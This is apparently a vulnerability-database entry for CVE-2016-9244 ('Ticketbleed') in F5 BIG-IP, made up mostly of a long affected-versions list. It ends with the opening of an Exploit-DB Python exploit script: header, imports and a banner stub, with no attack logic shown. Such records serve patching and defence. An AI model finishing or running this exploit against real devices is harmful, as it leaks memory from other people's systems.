ID

VAR-E-201702-0114


CVE

cve_id:CVE-2016-9244

Trust: 1.8

sources: BID: 96143 // PACKETSTORM: 141017 // EXPLOIT-DB: 44446

EDB ID

44446


TITLE

F5 BIG-IP 11.6 SSL Virtual Server - 'Ticketbleed' Memory Disclosure - Hardware remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 44446

DESCRIPTION

F5 BIG-IP 11.6 SSL Virtual Server - 'Ticketbleed' Memory Disclosure. CVE-2016-9244 . remote exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 44446

AFFECTED PRODUCTS

vendor:f5model:big-ip ssl virtual serverscope:eqversion:11.6

Trust: 2.2

vendor:f5model:big-ip ltmscope:eqversion:11.5

Trust: 0.6

vendor:ticketbleedmodel:f5 tlsscope: - version: -

Trust: 0.5

vendor:f5model:big-ip pemscope:eqversion:12.1.2

Trust: 0.3

vendor:f5model:big-ip pemscope:eqversion:12.1.1

Trust: 0.3

vendor:f5model:big-ip pem hf2scope:eqversion:12.1

Trust: 0.3

vendor:f5model:big-ip pem hf1scope:eqversion:12.1

Trust: 0.3

vendor:f5model:big-ip pem hf4scope:eqversion:12.0

Trust: 0.3

vendor:f5model:big-ip pem hf3scope:eqversion:12.0

Trust: 0.3

vendor:f5model:big-ip pem hf2scope:eqversion:12.0

Trust: 0.3

vendor:f5model:big-ip pemscope:eqversion:12.0

Trust: 0.3

vendor:f5model:big-ip pem hf1scope:eqversion:11.6.1

Trust: 0.3

vendor:f5model:big-ip pemscope:eqversion:11.6.1

Trust: 0.3

vendor:f5model:big-ip pem hf8scope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip pem hf6scope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip pem hf2scope:eqversion:11.5.4

Trust: 0.3

vendor:f5model:big-ip pem hf1scope:eqversion:11.5.4

Trust: 0.3

vendor:f5model:big-ip pem hf2scope:eqversion:11.5.3

Trust: 0.3

vendor:f5model:big-ip pemscope:eqversion:11.5.3

Trust: 0.3

vendor:f5model:big-ip pem hf11scope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip pem hf10scope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip pemscope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip pemscope:eqversion:11.5

Trust: 0.3

vendor:f5model:big-ip pem hf2scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip pemscope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip pemscope:eqversion:12.1.0

Trust: 0.3

vendor:f5model:big-ip pem hf1scope:eqversion:12.0.0

Trust: 0.3

vendor:f5model:big-ip pem hf5scope:eqversion:11.6.0

Trust: 0.3

vendor:f5model:big-ip pem hf4scope:eqversion:11.6.0

Trust: 0.3

vendor:f5model:big-ip pemscope:eqversion:11.6.0

Trust: 0.3

vendor:f5model:big-ip pemscope:eqversion:11.5.4

Trust: 0.3

vendor:f5model:big-ip pem hf1scope:eqversion:11.5.3

Trust: 0.3

vendor:f5model:big-ip pem hf9scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip pem hf8scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip pem hf10scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip pemscope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:12.1.2

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:12.1.1

Trust: 0.3

vendor:f5model:big-ip ltm hf2scope:eqversion:12.1

Trust: 0.3

vendor:f5model:big-ip ltm hf1scope:eqversion:12.1

Trust: 0.3

vendor:f5model:big-ip ltm hf4scope:eqversion:12.0

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:12.0

Trust: 0.3

vendor:f5model:big-ip ltm hf1scope:eqversion:11.6.1

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:11.6.1

Trust: 0.3

vendor:f5model:big-ip ltm hf8scope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip ltm hf7scope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip ltm hf6scope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip ltm hf2scope:eqversion:11.5.4

Trust: 0.3

vendor:f5model:big-ip ltm hf1scope:eqversion:11.5.4

Trust: 0.3

vendor:f5model:big-ip ltm hf2scope:eqversion:11.5.3

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:11.5.3

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:11.5.2

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip ltm hf9scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip ltm hf6scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip ltm hf5scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip ltm hf4scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip ltm hf3scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip ltm hf2scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip ltm hf1scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip ltm hf9scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip ltm hf8scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip ltm hf7scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip ltm hf2scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip ltm hf10scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:12.1.0

Trust: 0.3

vendor:f5model:big-ip ltm hf3scope:eqversion:12.0.0

Trust: 0.3

vendor:f5model:big-ip ltm hf2scope:eqversion:12.0.0

Trust: 0.3

vendor:f5model:big-ip ltm hf1scope:eqversion:12.0.0

Trust: 0.3

vendor:f5model:big-ip ltm hf5scope:eqversion:11.6.0

Trust: 0.3

vendor:f5model:big-ip ltm hf4scope:eqversion:11.6.0

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:11.6.0

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:11.5.4

Trust: 0.3

vendor:f5model:big-ip ltm hf1scope:eqversion:11.5.3

Trust: 0.3

vendor:f5model:big-ip ltm hf8scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip ltm hf11scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip ltm hf10scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip ltmscope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:12.1.2

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:12.1.1

Trust: 0.3

vendor:f5model:big-ip link controller hf2scope:eqversion:12.1

Trust: 0.3

vendor:f5model:big-ip link controller hf1scope:eqversion:12.1

Trust: 0.3

vendor:f5model:big-ip link controller hf4scope:eqversion:12.0

Trust: 0.3

vendor:f5model:big-ip link controller hf3scope:eqversion:12.0

Trust: 0.3

vendor:f5model:big-ip link controller hf2scope:eqversion:12.0

Trust: 0.3

vendor:f5model:big-ip link controller buildscope:eqversion:12.01.14.628

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:12.0

Trust: 0.3

vendor:f5model:big-ip link controller hf1scope:eqversion:11.6.1

Trust: 0.3

vendor:f5model:big-ip link controller hf8scope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip link controller hf6scope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip link controller hf4scope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip link controller buildscope:eqversion:11.66.204.442

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip link controller hf2scope:eqversion:11.5.4

Trust: 0.3

vendor:f5model:big-ip link controller hf1scope:eqversion:11.5.4

Trust: 0.3

vendor:f5model:big-ip link controller buildscope:eqversion:11.5.40.1.256

Trust: 0.3

vendor:f5model:big-ip link controller hf2scope:eqversion:11.5.3

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:11.5.3

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:11.5.2

Trust: 0.3

vendor:f5model:big-ip link controller hf8scope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip link controller hf11scope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip link controller hf10scope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip link controller hf7scope:eqversion:11.5

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:11.5

Trust: 0.3

vendor:f5model:big-ip link controller hf6scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip link controller hf5scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip link controller hf4scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip link controller hf3scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip link controller hf2scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip link controller hf1scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip link controller hf9scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip link controller hf8scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip link controller hf2scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip link controller hf10scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:12.1.0

Trust: 0.3

vendor:f5model:big-ip link controller hf1scope:eqversion:12.0.0

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:11.6.1

Trust: 0.3

vendor:f5model:big-ip link controller hf5scope:eqversion:11.6.0

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:11.5.4

Trust: 0.3

vendor:f5model:big-ip link controller hf1scope:eqversion:11.5.3

Trust: 0.3

vendor:f5model:big-ip link controller hf8scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip link controller hf10scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip link controllerscope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:12.1.2

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:12.1.1

Trust: 0.3

vendor:f5model:big-ip asm hf2scope:eqversion:12.1

Trust: 0.3

vendor:f5model:big-ip asm hf1scope:eqversion:12.1

Trust: 0.3

vendor:f5model:big-ip asm hf4scope:eqversion:12.0

Trust: 0.3

vendor:f5model:big-ip asm buildscope:eqversion:12.01.14.628

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:12.0

Trust: 0.3

vendor:f5model:big-ip asm hf1scope:eqversion:11.6.1

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:11.6.1

Trust: 0.3

vendor:f5model:big-ip asm hf8scope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip asm hf7scope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip asm hf6scope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip asm buildscope:eqversion:11.66.204.442

Trust: 0.3

vendor:f5model:big-ip asm hf1scope:eqversion:11.5.4

Trust: 0.3

vendor:f5model:big-ip asm buildscope:eqversion:11.5.40.1.256

Trust: 0.3

vendor:f5model:big-ip asm hf2scope:eqversion:11.5.3

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:11.5.3

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:11.5.2

Trust: 0.3

vendor:f5model:big-ip asm hf11scope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip asm hf10scope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip asm buildscope:eqversion:11.5.110.104.180

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:11.5

Trust: 0.3

vendor:f5model:big-ip asm hf6scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip asm hf5scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip asm hf4scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip asm hf3scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip asm hf2scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip asm hf1scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip asm build 685-hf10scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip asm hf9scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip asm hf8scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip asm hf2scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip asm hf10scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip asm hf1scope:eqversion:12.1.1

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:12.1.0

Trust: 0.3

vendor:f5model:big-ip asm hf3scope:eqversion:12.0.0

Trust: 0.3

vendor:f5model:big-ip asm hf2scope:eqversion:12.0.0

Trust: 0.3

vendor:f5model:big-ip asm hf1scope:eqversion:12.0.0

Trust: 0.3

vendor:f5model:big-ip asm hf5scope:eqversion:11.6.0

Trust: 0.3

vendor:f5model:big-ip asm hf4scope:eqversion:11.6.0

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:11.6.0

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:11.5.4

Trust: 0.3

vendor:f5model:big-ip asm hf1scope:eqversion:11.5.3

Trust: 0.3

vendor:f5model:big-ip asm hf9scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip asm hf8scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip asm hf10scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip asmscope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:12.1.2

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:12.1.1

Trust: 0.3

vendor:f5model:big-ip apm hf2scope:eqversion:12.1

Trust: 0.3

vendor:f5model:big-ip apm hf1scope:eqversion:12.1

Trust: 0.3

vendor:f5model:big-ip apm hf4scope:eqversion:12.0

Trust: 0.3

vendor:f5model:big-ip apm hf3scope:eqversion:12.0

Trust: 0.3

vendor:f5model:big-ip apm hf2scope:eqversion:12.0

Trust: 0.3

vendor:f5model:big-ip apm buildscope:eqversion:12.01.14.628

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:12.0

Trust: 0.3

vendor:f5model:big-ip apm hf1scope:eqversion:11.6.1

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:11.6.1

Trust: 0.3

vendor:f5model:big-ip apm hf8scope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip apm hf7scope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip apm hf6scope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip apm hf5scope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip apm hf4scope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip apm hf3scope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip apm buildscope:eqversion:11.66.204.442

Trust: 0.3

vendor:f5model:big-ip apm hf2scope:eqversion:11.5.4

Trust: 0.3

vendor:f5model:big-ip apm hf1scope:eqversion:11.5.4

Trust: 0.3

vendor:f5model:big-ip apm buildscope:eqversion:11.5.40.1.256

Trust: 0.3

vendor:f5model:big-ip apm hf2scope:eqversion:11.5.3

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:11.5.3

Trust: 0.3

vendor:f5model:big-ip apm hf1scope:eqversion:11.5.2

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:11.5.2

Trust: 0.3

vendor:f5model:big-ip apm hf11scope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip apm hf10scope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip apm buildscope:eqversion:11.5.110.104.180

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip apm hf9scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip apm hf8scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip apm hf6scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip apm hf5scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip apm hf4scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip apm hf3scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip apm hf2scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip apm hf1scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip apm build 685-hf10scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip apm hf9scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip apm hf8scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip apm hf2scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip apm hf10scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:12.1.0

Trust: 0.3

vendor:f5model:big-ip apm hf1scope:eqversion:12.0.0

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:11.6.0

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:11.5.4

Trust: 0.3

vendor:f5model:big-ip apm hf1scope:eqversion:11.5.3

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:11.5.0

Trust: 0.3

vendor:f5model:big-ip apm hf10scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip apmscope:eqversion:11.4.0

Trust: 0.3

vendor:f5model:big-ip analyticsscope:eqversion:12.1.2

Trust: 0.3

vendor:f5model:big-ip analyticsscope:eqversion:12.1.1

Trust: 0.3

vendor:f5model:big-ip analytics buildscope:eqversion:12.01.14.628

Trust: 0.3

vendor:f5model:big-ip analyticsscope:eqversion:12.0

Trust: 0.3

vendor:f5model:big-ip analytics hf1scope:eqversion:11.6.1

Trust: 0.3

vendor:f5model:big-ip analyticsscope:eqversion:11.6.1

Trust: 0.3

vendor:f5model:big-ip analytics hf7scope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip analytics hf6scope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip analytics hf4scope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip analytics buildscope:eqversion:11.66.204.442

Trust: 0.3

vendor:f5model:big-ip analytics hf2scope:eqversion:11.5.4

Trust: 0.3

vendor:f5model:big-ip analytics hf1scope:eqversion:11.5.4

Trust: 0.3

vendor:f5model:big-ip analytics buildscope:eqversion:11.5.40.1.256

Trust: 0.3

vendor:f5model:big-ip analytics hf2scope:eqversion:11.5.3

Trust: 0.3

vendor:f5model:big-ip analyticsscope:eqversion:11.5.3

Trust: 0.3

vendor:f5model:big-ip analyticsscope:eqversion:11.5.2

Trust: 0.3

vendor:f5model:big-ip analytics hf8scope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip analytics buildscope:eqversion:11.5.110.104.180

Trust: 0.3

vendor:f5model:big-ip analyticsscope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip analytics hf7scope:eqversion:11.5

Trust: 0.3

vendor:f5model:big-ip analyticsscope:eqversion:11.5

Trust: 0.3

vendor:f5model:big-ip analytics hf6scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip analytics hf5scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip analytics hf4scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip analytics hf3scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip analytics hf2scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip analytics hf1scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip analytics build 685-hf10scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip analytics hf9scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip analytics hf8scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip analytics hf2scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip analytics hf10scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip analyticsscope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip analyticsscope:eqversion:12.1.0

Trust: 0.3

vendor:f5model:big-ip analytics hf3scope:eqversion:12.0.0

Trust: 0.3

vendor:f5model:big-ip analytics hf2scope:eqversion:12.0.0

Trust: 0.3

vendor:f5model:big-ip analytics hf1scope:eqversion:12.0.0

Trust: 0.3

vendor:f5model:big-ip analytics hf5scope:eqversion:11.6.0

Trust: 0.3

vendor:f5model:big-ip analyticsscope:eqversion:11.6.0

Trust: 0.3

vendor:f5model:big-ip analyticsscope:eqversion:11.5.4

Trust: 0.3

vendor:f5model:big-ip analytics hf1scope:eqversion:11.5.3

Trust: 0.3

vendor:f5model:big-ip analytics hf9scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip analytics hf8scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip analytics hf10scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip analyticsscope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip afmscope:eqversion:12.1.2

Trust: 0.3

vendor:f5model:big-ip afmscope:eqversion:12.1.1

Trust: 0.3

vendor:f5model:big-ip afm hf2scope:eqversion:12.1

Trust: 0.3

vendor:f5model:big-ip afm hf1scope:eqversion:12.1

Trust: 0.3

vendor:f5model:big-ip afm hf4scope:eqversion:12.0

Trust: 0.3

vendor:f5model:big-ip afm buildscope:eqversion:12.01.14.628

Trust: 0.3

vendor:f5model:big-ip afmscope:eqversion:12.0

Trust: 0.3

vendor:f5model:big-ip afm hf1scope:eqversion:11.6.1

Trust: 0.3

vendor:f5model:big-ip afmscope:eqversion:11.6.1

Trust: 0.3

vendor:f5model:big-ip afm hf8scope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip afm hf7scope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip afm hf6scope:eqversion:11.6

Trust: 0.3

vendor:f5model:big-ip afm buildscope:eqversion:11.66.204.442

Trust: 0.3

vendor:f5model:big-ip afm hf2scope:eqversion:11.5.4

Trust: 0.3

vendor:f5model:big-ip afm hf1scope:eqversion:11.5.4

Trust: 0.3

vendor:f5model:big-ip afm buildscope:eqversion:11.5.40.1.256

Trust: 0.3

vendor:f5model:big-ip afm hf2scope:eqversion:11.5.3

Trust: 0.3

vendor:f5model:big-ip afmscope:eqversion:11.5.3

Trust: 0.3

vendor:f5model:big-ip afmscope:eqversion:11.5.2

Trust: 0.3

vendor:f5model:big-ip afm hf11scope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip afm hf10scope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip afm buildscope:eqversion:11.5.110.104.180

Trust: 0.3

vendor:f5model:big-ip afmscope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip afmscope:eqversion:11.5

Trust: 0.3

vendor:f5model:big-ip afm hf2scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip afm hf1scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip afm build 685-hf10scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip afm hf9scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip afm hf8scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip afm hf2scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip afm hf10scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip afmscope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip afmscope:eqversion:12.1.0

Trust: 0.3

vendor:f5model:big-ip afm hf3scope:eqversion:12.0.0

Trust: 0.3

vendor:f5model:big-ip afm hf2scope:eqversion:12.0.0

Trust: 0.3

vendor:f5model:big-ip afm hf1scope:eqversion:12.0.0

Trust: 0.3

vendor:f5model:big-ip afm hf5scope:eqversion:11.6.0

Trust: 0.3

vendor:f5model:big-ip afm hf4scope:eqversion:11.6.0

Trust: 0.3

vendor:f5model:big-ip afmscope:eqversion:11.6.0

Trust: 0.3

vendor:f5model:big-ip afmscope:eqversion:11.5.4

Trust: 0.3

vendor:f5model:big-ip afm hf1scope:eqversion:11.5.3

Trust: 0.3

vendor:f5model:big-ip afm hf10scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip afmscope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip aamscope:eqversion:12.1.2

Trust: 0.3

vendor:f5model:big-ip aamscope:eqversion:12.1.1

Trust: 0.3

vendor:f5model:big-ip aam hf2scope:eqversion:12.1

Trust: 0.3

vendor:f5model:big-ip aam hf1scope:eqversion:12.1

Trust: 0.3

vendor:f5model:big-ip aam hf4scope:eqversion:12.0

Trust: 0.3

vendor:f5model:big-ip aamscope:eqversion:12.0

Trust: 0.3

vendor:f5model:big-ip aam hf2scope:eqversion:11.5.4

Trust: 0.3

vendor:f5model:big-ip aam hf1scope:eqversion:11.5.4

Trust: 0.3

vendor:f5model:big-ip aam buildscope:eqversion:11.5.40.1.256

Trust: 0.3

vendor:f5model:big-ip aam hf2scope:eqversion:11.5.3

Trust: 0.3

vendor:f5model:big-ip aamscope:eqversion:11.5.3

Trust: 0.3

vendor:f5model:big-ip aamscope:eqversion:11.5.2

Trust: 0.3

vendor:f5model:big-ip aam hf11scope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip aam hf10scope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip aam buildscope:eqversion:11.5.110.104.180

Trust: 0.3

vendor:f5model:big-ip aamscope:eqversion:11.5.1

Trust: 0.3

vendor:f5model:big-ip aamscope:eqversion:11.5

Trust: 0.3

vendor:f5model:big-ip aam hf6scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip aam hf5scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip aam hf4scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip aam hf3scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip aam hf2scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip aam hf1scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip aam build 685-hf10scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip aam hf9scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip aam hf8scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip aam hf2scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip aam hf10scope:eqversion:11.4

Trust: 0.3

vendor:f5model:big-ip aamscope:eqversion:12.1.0

Trust: 0.3

vendor:f5model:big-ip aam hf3scope:eqversion:12.0.0

Trust: 0.3

vendor:f5model:big-ip aam hf2scope:eqversion:12.0.0

Trust: 0.3

vendor:f5model:big-ip aam hf1scope:eqversion:12.0.0

Trust: 0.3

vendor:f5model:big-ip aamscope:eqversion:11.5.4

Trust: 0.3

vendor:f5model:big-ip aam hf1scope:eqversion:11.5.3

Trust: 0.3

vendor:f5model:big-ip aam hf9scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip aam hf8scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip aam hf10scope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip aamscope:eqversion:11.4.1

Trust: 0.3

vendor:f5model:big-ip aamscope:eqversion:11.4.0

Trust: 0.3

vendor:f5model:big-ip pem hf2scope:neversion:11.6.1

Trust: 0.3

vendor:f5model:big-ip ltm hf2scope:neversion:11.6.1

Trust: 0.3

vendor:f5model:big-ip ltmscope:neversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip link controller hf2scope:neversion:11.6.1

Trust: 0.3

vendor:f5model:big-ip link controllerscope:neversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip asm hf2scope:neversion:11.6.1

Trust: 0.3

vendor:f5model:big-ip asmscope:neversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip apm hf2scope:neversion:11.6.1

Trust: 0.3

vendor:f5model:big-ip apmscope:neversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip analytics hf2scope:neversion:11.6.1

Trust: 0.3

vendor:f5model:big-ip analyticsscope:neversion:11.2.1

Trust: 0.3

vendor:f5model:big-ip afm hf2scope:neversion:11.6.1

Trust: 0.3

vendor:f5model:big-ip aam hf2scope:neversion:11.6.1

Trust: 0.3

sources: BID: 96143 // PACKETSTORM: 141017 // EXPLOIT-DB: 44446 // EDBNET: 97481 // EDBNET: 97483

EXPLOIT

# -*- coding: utf-8 -*-
#!/usr/bin/python
# Exploit Title: Ticketbleed
# Google Dork: n/a
# Date: Exploit: 02/13/17, Advisory Published: 02/09/17
# Exploit Author: @0x00string
# Vendor Homepage: https://f5.com/
# Software Link: https://support.f5.com/csp/article/K05121675
# Version: see software link for versions
# Tested on: F5 BIGIP 11.6
# CVE : CVE-2016-9244
# require: scapy_ssl_tls (https://github.com/tintinweb/scapy-ssl_tls)
import re, getopt, sys, socket
from struct import *
try:
from scapy_ssl_tls.ssl_tls import *
except ImportError:
from scapy.layers.ssl_tls import *

def banner():
print '''
